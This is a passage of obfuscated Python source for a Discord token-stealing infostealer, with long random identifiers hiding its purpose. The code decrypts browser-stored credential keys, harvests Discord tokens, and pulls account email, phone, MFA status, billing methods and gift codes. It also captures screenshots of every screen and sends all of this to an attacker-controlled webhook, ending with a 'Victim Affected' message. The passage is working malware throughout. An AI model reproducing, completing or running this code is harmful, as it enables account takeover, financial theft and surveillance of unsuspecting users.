                                    if JTPXJHZNUHUJYIXUMGRLNLSPUWIBZNAIENUDVFDBSSRCYCHCCRJUPXUYBIMNZDAAWBATAHGHCGQYKVMFPNKHQEQ(WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ, XOWFXGYJBFNXVLSPBXXVBQZOPWUTXPIZFKLILYZHPETBFQKITBTBEEFIBNCRRNPMULU):
                                        FZUUWVODTLZTEJUZWKPOMCWSPTFMVIBJOBEAZUNIWVGJEKUKDBNIW = requests.get(XOWFXGYJBFNXVLSPBXXVBQZOPWUTXPIZFKLILYZHPETBFQKITBTBEEFIBNCRRNPMULU, headers={'Authorization': WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ}).json()['id']
                                        if FZUUWVODTLZTEJUZWKPOMCWSPTFMVIBJOBEAZUNIWVGJEKUKDBNIW not in PJTBXKTPMGAYSRSFTXCCMOUUKWQMOCUKHRAPHRAGXHUDIZPIJELXRSBVADXPBTQPOMXVXNBIHZXUSQQGHXPAHTDEJARPPJ:
                                            RTQUJEDSNSFXANHCMJWYQKDNZDJVYGKYVTIKBBQVAWVNTCPNXORPNOUONDDAPEJTWGGWAFIREKOJXISZIOMNRWFEXE.append(WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ)
                                            PJTBXKTPMGAYSRSFTXCCMOUUKWQMOCUKHRAPHRAGXHUDIZPIJELXRSBVADXPBTQPOMXVXNBIHZXUSQQGHXPAHTDEJARPPJ.append(FZUUWVODTLZTEJUZWKPOMCWSPTFMVIBJOBEAZUNIWVGJEKUKDBNIW)
                                            KECNWROQOMFPLYQVRXTMWZHKLCGJUHJVLUBLYNWJGVXZMKUVPCAZUNWDLUHBWPFCEDSVWAQQVWFBMUVF[WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ] = ('Firefox', f"{INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK}\\{v4r__file}")
        return RTQUJEDSNSFXANHCMJWYQKDNZDJVYGKYVTIKBBQVAWVNTCPNXORPNOUONDDAPEJTWGGWAFIREKOJXISZIOMNRWFEXE, KECNWROQOMFPLYQVRXTMWZHKLCGJUHJVLUBLYNWJGVXZMKUVPCAZUNWDLUHBWPFCEDSVWAQQVWFBMUVF

    def JTPXJHZNUHUJYIXUMGRLNLSPUWIBZNAIENUDVFDBSSRCYCHCCRJUPXUYBIMNZDAAWBATAHGHCGQYKVMFPNKHQEQ(WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ, XOWFXGYJBFNXVLSPBXXVBQZOPWUTXPIZFKLILYZHPETBFQKITBTBEEFIBNCRRNPMULU):
        return requests.get(XOWFXGYJBFNXVLSPBXXVBQZOPWUTXPIZFKLILYZHPETBFQKITBTBEEFIBNCRRNPMULU, headers={'Authorization': WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ}).status_code == 200

    def EETINXGTAXUPCZKGJWPCQZCPPKTCNPEXFEHHNZHEJRIXVZBVIAETNTDWOOXKVXGUHGWGVal(VDJNJGOEFCWCGUOHWHKZEYUQGWTQAFMBCPDUXQAPRYSPGZZRHHJXZSSDI, XHBLZYMDAQLUAPGUKXCPMUXNHCPMLHBCENXHVQZBNSPVVCSMVLNAMAFLR):
        PQDZINNTNOHZNWHRVBFBROZQULWCLJYILZCCOLCLOTHTLZJVIGJGMH = VDJNJGOEFCWCGUOHWHKZEYUQGWTQAFMBCPDUXQAPRYSPGZZRHHJXZSSDI[3:15]
        AMVNPIKKILJGXMLRFPKSQSFAZQSYUTBBETDDZZESFROCKOSSBOLWWRJONSXUFQKTNUANJEMUCZICU = VDJNJGOEFCWCGUOHWHKZEYUQGWTQAFMBCPDUXQAPRYSPGZZRHHJXZSSDI[15:]
        QIELSRILKDTBSOOLNXOVNLKNBAYVKXZZDWIZDLZDJHMPYUUDTFFIQSCKYHYTJONGAMJCHDCHCCPXJWQTTZOMGOXALRTC = AES.new(XHBLZYMDAQLUAPGUKXCPMUXNHCPMLHBCENXHVQZBNSPVVCSMVLNAMAFLR, AES.MODE_GCM, PQDZINNTNOHZNWHRVBFBROZQULWCLJYILZCCOLCLOTHTLZJVIGJGMH)
        return QIELSRILKDTBSOOLNXOVNLKNBAYVKXZZDWIZDLZDJHMPYUUDTFFIQSCKYHYTJONGAMJCHDCHCCPXJWQTTZOMGOXALRTC.decrypt(AMVNPIKKILJGXMLRFPKSQSFAZQSYUTBBETDDZZESFROCKOSSBOLWWRJONSXUFQKTNUANJEMUCZICU)[:-16].decode()

    def ARGVHWHNCTFIVUGEDXVRAHQSIXGTZETXKERHJLORDMQNYSWFGHWRICBEAMSYRVVSEDNAOXGOGXDKADOUBUVLKCTFQC(INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK):
        if not os.path.exists(INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK):
            return None
        with open(INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK, "r", encoding="utf-8") as v4r_f:
            ZEMWKHYPOHVRFCDHKVWHFBAYKZHRJUMBEUJIJECVLGTLAETTOCWUZWHTHFMRZIH = json.load(v4r_f)
        XHBLZYMDAQLUAPGUKXCPMUXNHCPMLHBCENXHVQZBNSPVVCSMVLNAMAFLR = base64.b64decode(ZEMWKHYPOHVRFCDHKVWHFBAYKZHRJUMBEUJIJECVLGTLAETTOCWUZWHTHFMRZIH["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(XHBLZYMDAQLUAPGUKXCPMUXNHCPMLHBCENXHVQZBNSPVVCSMVLNAMAFLR, None, None, None, 0)[1]

    RTQUJEDSNSFXANHCMJWYQKDNZDJVYGKYVTIKBBQVAWVNTCPNXORPNOUONDDAPEJTWGGWAFIREKOJXISZIOMNRWFEXE, KECNWROQOMFPLYQVRXTMWZHKLCGJUHJVLUBLYNWJGVXZMKUVPCAZUNWDLUHBWPFCEDSVWAQQVWFBMUVF = OSOVCDAEBIWOVYBZEGGRBXZZDHUYDYBXZLNBVFBWQQCORQXVGMCVHUZQVREUUBGEZCEUHURKNWAIYLRJUNSTBGA()
    KWRJCWTAGGQWYWCFETNXSXOUTTMQHNTLAQASRSPIWJYKMUGVPNHEDCHTIOIWYLPYUCOWZOAXTQCHEUSRKFMCZBUZUCJEF = SyncWebhook.from_url(XFPYMGNWYTCXHRPSAZIJUDBSKKJSMGGIPLUDNNZGMXGYPCJJQIXHKDLYEPBZJD)

    if not RTQUJEDSNSFXANHCMJWYQKDNZDJVYGKYVTIKBBQVAWVNTCPNXORPNOUONDDAPEJTWGGWAFIREKOJXISZIOMNRWFEXE:
        HHBNVVHCECGMCXAKTXEOCOCQBBWDOBYRALZYCCJOGYAATPBBWLOJBQU(
            XFPYMGNWYTCXHRPSAZIJUDBSKKJSMGGIPLUDNNZGMXGYPCJJQIXHKDLYEPBZJD, 
            title=f'Discord Token {QLCBWIEQVVUZNWUHVOQAXBXBRKUEXVCCUMVVWGSWYHYIBWRRGKZVYGLLHXYCID}:', 
            description=f"No discord tokens found."
        )
        return
    
    for WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ_d15c0rd in RTQUJEDSNSFXANHCMJWYQKDNZDJVYGKYVTIKBBQVAWVNTCPNXORPNOUONDDAPEJTWGGWAFIREKOJXISZIOMNRWFEXE:
        UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ_d15c0rd}).json()

        FSDITDTOFKYCLACFCKOYIYAHKTFGCDDXEMWYMTECYYDRNENBCTLRLJK = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('username', "None") + '#' + UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('discriminator', "None")
        ZQMVPKAAEUAQASYAXVCQSUIFQCHLHMYLLWVLWRTFDWUPXXQXZDVFOIIIOPDCZCUUQVLKYASAKFXXLMBFUBK = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('global_name', "None")
        XVXEYHSTSRJCRNXAZEPQVFGBLLAUYVZIVSKBZCBEXYQMMIHNOYXOUMZYYKP = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('id', "None")
        AGNBOISBJYYCTTASXCHXYBMEQJHJRVIBXBWIWTTKCYQNLPMPFGPUDEUUMYWV = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('email', "None")
        GPXRROYLFFCTHQXBMBJIRWPUFOTVRCOFHAOBPIDWTXIMNZNCDWOLBYYGKLCQGCWFPIJWNVZNYXXAIMCXN = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('verified', "None")
        VBOPUZJHBWAVHJPABTZYVIKCTFLTANJWFPXTMASICDKWQAMONBFKDVOEDFRNBADNVVCIOWHWOYLLJVYS = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('phone', "None")
        LWUIBJJUZUITVOKGHKVGQXTNFCYPRDSQJYNEVQOVDKPTIMDDGIMTUSVUMZYLMCXJPXA = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('locale', "None")
        TCBDKTWDKAZARNREHLVBMWLMZJUHKUTGLNXHBWPZZXZILAMNRKWBNOIBJVCUAQTWW = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('mfa_enabled', "None")

        try:
            if UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('premium_type', 'None') == 0:
                ZNRZEANCRUWKMPOSYEOICULEEKZBUNPLYPGWHEQVAOGSSYHQCCPZNS = 'False'
            elif UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('premium_type', 'None') == 1:
                ZNRZEANCRUWKMPOSYEOICULEEKZBUNPLYPGWHEQVAOGSSYHQCCPZNS = 'Nitro Classic'
            elif UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('premium_type', 'None') == 2:
                ZNRZEANCRUWKMPOSYEOICULEEKZBUNPLYPGWHEQVAOGSSYHQCCPZNS = 'Nitro Boosts'
            elif UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('premium_type', 'None') == 3:
                ZNRZEANCRUWKMPOSYEOICULEEKZBUNPLYPGWHEQVAOGSSYHQCCPZNS = 'Nitro Basic'
            else:
                ZNRZEANCRUWKMPOSYEOICULEEKZBUNPLYPGWHEQVAOGSSYHQCCPZNS = 'False'
        except:
            ZNRZEANCRUWKMPOSYEOICULEEKZBUNPLYPGWHEQVAOGSSYHQCCPZNS = "None"

        try: 
            FPWGPNRDDQHSEPQKFWLKQHHALSLXJGPMACZCDTAPBHHWBVHZIAHHC = f"https://cdn.discordapp.com/avatars/{XVXEYHSTSRJCRNXAZEPQVFGBLLAUYVZIVSKBZCBEXYQMMIHNOYXOUMZYYKP}/{UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{XVXEYHSTSRJCRNXAZEPQVFGBLLAUYVZIVSKBZCBEXYQMMIHNOYXOUMZYYKP}/{UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{XVXEYHSTSRJCRNXAZEPQVFGBLLAUYVZIVSKBZCBEXYQMMIHNOYXOUMZYYKP}/{UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX['avatar']}.png"
        except: 
            FPWGPNRDDQHSEPQKFWLKQHHALSLXJGPMACZCDTAPBHHWBVHZIAHHC = IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR

        try:
            IKPAPZOJJJMTPGIFNHTUZYMJKVOJOWPJEPEHCOTHEZOEEWZLLUBYQSNNCDGXEUVHRTIQPUHWLAQOYYRVKTZY = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ_d15c0rd}).json()
            if IKPAPZOJJJMTPGIFNHTUZYMJKVOJOWPJEPEHCOTHEZOEEWZLLUBYQSNNCDGXEUVHRTIQPUHWLAQOYYRVKTZY:
                ZNYLLTMKLUNOQTRZIANHTXVRFYWOYAMYZJMSKHZNVPCDJLGEXFPSOQCIXWDPLFZPWSJQYFLZIRVWEOZBRHOI = []

                for v4r_method in IKPAPZOJJJMTPGIFNHTUZYMJKVOJOWPJEPEHCOTHEZOEEWZLLUBYQSNNCDGXEUVHRTIQPUHWLAQOYYRVKTZY:
                    if v4r_method['type'] == 1:
                        ZNYLLTMKLUNOQTRZIANHTXVRFYWOYAMYZJMSKHZNVPCDJLGEXFPSOQCIXWDPLFZPWSJQYFLZIRVWEOZBRHOI.append('CB')
                    elif v4r_method['type'] == 2:
                        ZNYLLTMKLUNOQTRZIANHTXVRFYWOYAMYZJMSKHZNVPCDJLGEXFPSOQCIXWDPLFZPWSJQYFLZIRVWEOZBRHOI.append("Paypal")
                    else:
                        ZNYLLTMKLUNOQTRZIANHTXVRFYWOYAMYZJMSKHZNVPCDJLGEXFPSOQCIXWDPLFZPWSJQYFLZIRVWEOZBRHOI.append('Other')
                ZNYLLTMKLUNOQTRZIANHTXVRFYWOYAMYZJMSKHZNVPCDJLGEXFPSOQCIXWDPLFZPWSJQYFLZIRVWEOZBRHOI = ' / '.join(ZNYLLTMKLUNOQTRZIANHTXVRFYWOYAMYZJMSKHZNVPCDJLGEXFPSOQCIXWDPLFZPWSJQYFLZIRVWEOZBRHOI)
            else:
                ZNYLLTMKLUNOQTRZIANHTXVRFYWOYAMYZJMSKHZNVPCDJLGEXFPSOQCIXWDPLFZPWSJQYFLZIRVWEOZBRHOI = "None"
        except:
            ZNYLLTMKLUNOQTRZIANHTXVRFYWOYAMYZJMSKHZNVPCDJLGEXFPSOQCIXWDPLFZPWSJQYFLZIRVWEOZBRHOI = "None"

        try:
            IAZBWTMHUSUOCFDDVTAUZUGUDQZEEAGOCSMTFXEQXTMHBCKXIKKYURABAHQKYUNSDHVTRMKU = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ_d15c0rd}).json()
            if IAZBWTMHUSUOCFDDVTAUZUGUDQZEEAGOCSMTFXEQXTMHBCKXIKKYURABAHQKYUNSDHVTRMKU:
                BTOBMXXOZSAOXXRBJHNHUAQTQKQWSGIZYVLVREMJNECGUZWGMN = []
                for JFOPUHBVALQBVMZRMHVWZIDSXCRRJQYKGFCYLNNMVFWBBOBTUSWISTGZUVIUERTSSDOLIBCDNUCHOZEYMNJYRCEXWJQVFI in IAZBWTMHUSUOCFDDVTAUZUGUDQZEEAGOCSMTFXEQXTMHBCKXIKKYURABAHQKYUNSDHVTRMKU:
                    EGLOHMHWBRJQYYTOPHFDKFNMTFVHDHHUIFKAEXHJJIIIKMJXJFCHSPHNHAATAAEMGKMEYJNIAWCOUA = JFOPUHBVALQBVMZRMHVWZIDSXCRRJQYKGFCYLNNMVFWBBOBTUSWISTGZUVIUERTSSDOLIBCDNUCHOZEYMNJYRCEXWJQVFI['promotion']['outbound_title']
                    JFOPUHBVALQBVMZRMHVWZIDSXCRRJQYKGFCYLNNMVFWBBOBTUSWISTGZUVIUERTSSDOLIBCDNUCHOZEYMNJYRCEXWJQVFI = JFOPUHBVALQBVMZRMHVWZIDSXCRRJQYKGFCYLNNMVFWBBOBTUSWISTGZUVIUERTSSDOLIBCDNUCHOZEYMNJYRCEXWJQVFI['code']
                    NIEFNOFWZWLYUMUCADQLMNIMEKZKLWZVYIZMUFLPEQAWDHOVDBMDSKOQSIFIKOCIGHMPNEKNKLUF = f"Gift: {EGLOHMHWBRJQYYTOPHFDKFNMTFVHDHHUIFKAEXHJJIIIKMJXJFCHSPHNHAATAAEMGKMEYJNIAWCOUA}\nCode: {JFOPUHBVALQBVMZRMHVWZIDSXCRRJQYKGFCYLNNMVFWBBOBTUSWISTGZUVIUERTSSDOLIBCDNUCHOZEYMNJYRCEXWJQVFI}"
                    if len('\n\n'.join(JFOPUHBVALQBVMZRMHVWZIDSXCRRJQYKGFCYLNNMVFWBBOBTUSWISTGZUVIUERTSSDOLIBCDNUCHOZEYMNJYRCEXWJQVFI)) + len(NIEFNOFWZWLYUMUCADQLMNIMEKZKLWZVYIZMUFLPEQAWDHOVDBMDSKOQSIFIKOCIGHMPNEKNKLUF) >= 1024:
                        break
                    BTOBMXXOZSAOXXRBJHNHUAQTQKQWSGIZYVLVREMJNECGUZWGMN.append(NIEFNOFWZWLYUMUCADQLMNIMEKZKLWZVYIZMUFLPEQAWDHOVDBMDSKOQSIFIKOCIGHMPNEKNKLUF)
                if len(BTOBMXXOZSAOXXRBJHNHUAQTQKQWSGIZYVLVREMJNECGUZWGMN) > 0:
                    JFOPUHBVALQBVMZRMHVWZIDSXCRRJQYKGFCYLNNMVFWBBOBTUSWISTGZUVIUERTSSDOLIBCDNUCHOZEYMNJYRCEXWJQVFI = '\n\n'.join(BTOBMXXOZSAOXXRBJHNHUAQTQKQWSGIZYVLVREMJNECGUZWGMN)
                else:
                    JFOPUHBVALQBVMZRMHVWZIDSXCRRJQYKGFCYLNNMVFWBBOBTUSWISTGZUVIUERTSSDOLIBCDNUCHOZEYMNJYRCEXWJQVFI = "None"
            else:
                JFOPUHBVALQBVMZRMHVWZIDSXCRRJQYKGFCYLNNMVFWBBOBTUSWISTGZUVIUERTSSDOLIBCDNUCHOZEYMNJYRCEXWJQVFI = "None"
        except:
            JFOPUHBVALQBVMZRMHVWZIDSXCRRJQYKGFCYLNNMVFWBBOBTUSWISTGZUVIUERTSSDOLIBCDNUCHOZEYMNJYRCEXWJQVFI = "None"
    
        v4r_software_name, INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK = KECNWROQOMFPLYQVRXTMWZHKLCGJUHJVLUBLYNWJGVXZMKUVPCAZUNWDLUHBWPFCEDSVWAQQVWFBMUVF.get(WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ_d15c0rd, ("Unknown Software", "Unknown location"))

        embed = Embed(title=f'Discord Token {QLCBWIEQVVUZNWUHVOQAXBXBRKUEXVCCUMVVWGSWYHYIBWRRGKZVYGLLHXYCID}:', color=NDZNZJWCYHXULIEBQOGILPOEDLVAIHCGAVLBZYISVQROYBYCYXLBUEAGSKGONODBBJIVP)      
        embed.add_field(name=":file_folder: Path:", value=f"```{INMSZGBKDBZSTEKYMSWNROPGIZQDWMMNZIDZBEBTUHQKCKKKOJKXNUKRK}```", inline=True)
        embed.add_field(name=":globe_with_meridians: Token:", value=f"```{WWOAOMEHWTVWREWEGORCAJBGNVZYJHTQGQAFSEVBWTJRKTBZSTUZMWHNBEBIHGRGONQZ_d15c0rd}```", inline=True)
        embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
        embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{FSDITDTOFKYCLACFCKOYIYAHKTFGCDDXEMWYMTECYYDRNENBCTLRLJK}```", inline=True)
        embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{ZQMVPKAAEUAQASYAXVCQSUIFQCHLHMYLLWVLWRTFDWUPXXQXZDVFOIIIOPDCZCUUQVLKYASAKFXXLMBFUBK}```", inline=True)
        embed.add_field(name=":robot: Id:", value=f"```{XVXEYHSTSRJCRNXAZEPQVFGBLLAUYVZIVSKBZCBEXYQMMIHNOYXOUMZYYKP}```", inline=True)
        embed.add_field(name=":e_mail: Email:", value=f"```{AGNBOISBJYYCTTASXCHXYBMEQJHJRVIBXBWIWTTKCYQNLPMPFGPUDEUUMYWV}```", inline=True)
        embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{GPXRROYLFFCTHQXBMBJIRWPUFOTVRCOFHAOBPIDWTXIMNZNCDWOLBYYGKLCQGCWFPIJWNVZNYXXAIMCXN}```", inline=True)
        embed.add_field(name=":telephone_receiver: Phone:", value=f"```{VBOPUZJHBWAVHJPABTZYVIKCTFLTANJWFPXTMASICDKWQAMONBFKDVOEDFRNBADNVVCIOWHWOYLLJVYS}```", inline=True)   
        embed.add_field(name=":rocket: Nitro:", value=f"```{ZNRZEANCRUWKMPOSYEOICULEEKZBUNPLYPGWHEQVAOGSSYHQCCPZNS}```", inline=True)
        embed.add_field(name=":earth_africa: Language:", value=f"```{LWUIBJJUZUITVOKGHKVGQXTNFCYPRDSQJYNEVQOVDKPTIMDDGIMTUSVUMZYLMCXJPXA}```", inline=True)
        embed.add_field(name=":moneybag: Billing:", value=f"```{ZNYLLTMKLUNOQTRZIANHTXVRFYWOYAMYZJMSKHZNVPCDJLGEXFPSOQCIXWDPLFZPWSJQYFLZIRVWEOZBRHOI}```", inline=True)
        embed.add_field(name=":gift: Gift Code:", value=f"```{JFOPUHBVALQBVMZRMHVWZIDSXCRRJQYKGFCYLNNMVFWBBOBTUSWISTGZUVIUERTSSDOLIBCDNUCHOZEYMNJYRCEXWJQVFI}```", inline=True)
        embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{TCBDKTWDKAZARNREHLVBMWLMZJUHKUTGLNXHBWPZZXZILAMNRKWBNOIBJVCUAQTWW}```", inline=True)
        embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
        embed.set_image(url=FPWGPNRDDQHSEPQKFWLKQHHALSLXJGPMACZCDTAPBHHWBVHZIAHHC)
        embed.set_footer(text=GDBWKXYLDZVZBNWZZFFZYRRGPHFAMOYZKBGQJCAWYZHKXURVGYSOFDUEQZLDPTGN, icon_url=IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR)
        KWRJCWTAGGQWYWCFETNXSXOUTTMQHNTLAQASRSPIWJYKMUGVPNHEDCHTIOIWYLPYUCOWZOAXTQCHEUSRKFMCZBUZUCJEF.send(embed=embed, username=TCQVWBVWRGAWZJFAVAAEZLFRUWGNTHXWRMCHKMDTPFLHWJJBRKGWLG, avatar_url=IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR)

def UHNKXCIUCYFGYLBVQYJHZVJGRNRLGQNRBKZDPTEZKSXYCRWCCFSTTTXLNTDOHHKYCLJNMDQVBIJXJRDXMCONYWLPPPHYXLGVEGPT():
    import io
    from PIL import ImageGrab
    from discord import SyncWebhook, Embed, File
    
    try:
        def C4ptur3():
            MFVGBIOOJNSSFEHUWBQIIOCUEZMUQBEUAADJRIHPLSVZACHWYUZCJXZBCZTEQMRSSXO = ImageGrab.grab(
                bbox=None,
                include_layered_windows=False,
                all_screens=True,
                xdisplay=None
            )
            MFVGBIOOJNSSFEHUWBQIIOCUEZMUQBEUAADJRIHPLSVZACHWYUZCJXZBCZTEQMRSSXO_bytes = io.BytesIO()
            MFVGBIOOJNSSFEHUWBQIIOCUEZMUQBEUAADJRIHPLSVZACHWYUZCJXZBCZTEQMRSSXO.save(MFVGBIOOJNSSFEHUWBQIIOCUEZMUQBEUAADJRIHPLSVZACHWYUZCJXZBCZTEQMRSSXO_bytes, format='PNG')
            MFVGBIOOJNSSFEHUWBQIIOCUEZMUQBEUAADJRIHPLSVZACHWYUZCJXZBCZTEQMRSSXO_bytes.seek(0)
            return MFVGBIOOJNSSFEHUWBQIIOCUEZMUQBEUAADJRIHPLSVZACHWYUZCJXZBCZTEQMRSSXO_bytes
        
        MFVGBIOOJNSSFEHUWBQIIOCUEZMUQBEUAADJRIHPLSVZACHWYUZCJXZBCZTEQMRSSXO_bytes = C4ptur3()

        TTBWSFWIPOPMLBDZMWNTMFLNOGAZFIGUAJHEOYVQIZUTFZBKPDRCCWPFLPJNDNHYYQDWDNIBCLHYVELARCFYTQJEIKTIJRXULOK = Embed(title=f"Screenshot {QLCBWIEQVVUZNWUHVOQAXBXBRKUEXVCCUMVVWGSWYHYIBWRRGKZVYGLLHXYCID}:", color=NDZNZJWCYHXULIEBQOGILPOEDLVAIHCGAVLBZYISVQROYBYCYXLBUEAGSKGONODBBJIVP)
        TTBWSFWIPOPMLBDZMWNTMFLNOGAZFIGUAJHEOYVQIZUTFZBKPDRCCWPFLPJNDNHYYQDWDNIBCLHYVELARCFYTQJEIKTIJRXULOK.set_image(url="attachment://screenshot.png")
        TTBWSFWIPOPMLBDZMWNTMFLNOGAZFIGUAJHEOYVQIZUTFZBKPDRCCWPFLPJNDNHYYQDWDNIBCLHYVELARCFYTQJEIKTIJRXULOK.set_footer(text=GDBWKXYLDZVZBNWZZFFZYRRGPHFAMOYZKBGQJCAWYZHKXURVGYSOFDUEQZLDPTGN, icon_url=IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR)
        KWRJCWTAGGQWYWCFETNXSXOUTTMQHNTLAQASRSPIWJYKMUGVPNHEDCHTIOIWYLPYUCOWZOAXTQCHEUSRKFMCZBUZUCJEF = SyncWebhook.from_url(XFPYMGNWYTCXHRPSAZIJUDBSKKJSMGGIPLUDNNZGMXGYPCJJQIXHKDLYEPBZJD)
        KWRJCWTAGGQWYWCFETNXSXOUTTMQHNTLAQASRSPIWJYKMUGVPNHEDCHTIOIWYLPYUCOWZOAXTQCHEUSRKFMCZBUZUCJEF.send(
            embed=TTBWSFWIPOPMLBDZMWNTMFLNOGAZFIGUAJHEOYVQIZUTFZBKPDRCCWPFLPJNDNHYYQDWDNIBCLHYVELARCFYTQJEIKTIJRXULOK,
            file=File(MFVGBIOOJNSSFEHUWBQIIOCUEZMUQBEUAADJRIHPLSVZACHWYUZCJXZBCZTEQMRSSXO_bytes, filename="screenshot.png"),
            username=TCQVWBVWRGAWZJFAVAAEZLFRUWGNTHXWRMCHKMDTPFLHWJJBRKGWLG,
            avatar_url=IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR
        )
    except Exception as e:
        HHBNVVHCECGMCXAKTXEOCOCQBBWDOBYRALZYCCJOGYAATPBBWLOJBQU(
            XFPYMGNWYTCXHRPSAZIJUDBSKKJSMGGIPLUDNNZGMXGYPCJJQIXHKDLYEPBZJD, 
            title=f'Screenshot {QLCBWIEQVVUZNWUHVOQAXBXBRKUEXVCCUMVVWGSWYHYIBWRRGKZVYGLLHXYCID}:', 
            description=f"""**Unable to take a screenshot:**
            ```{e}```"""
        )

try: requests.post(XFPYMGNWYTCXHRPSAZIJUDBSKKJSMGGIPLUDNNZGMXGYPCJJQIXHKDLYEPBZJD, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': TCQVWBVWRGAWZJFAVAAEZLFRUWGNTHXWRMCHKMDTPFLHWJJBRKGWLG, 'avatar_url': IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR,})
except: pass
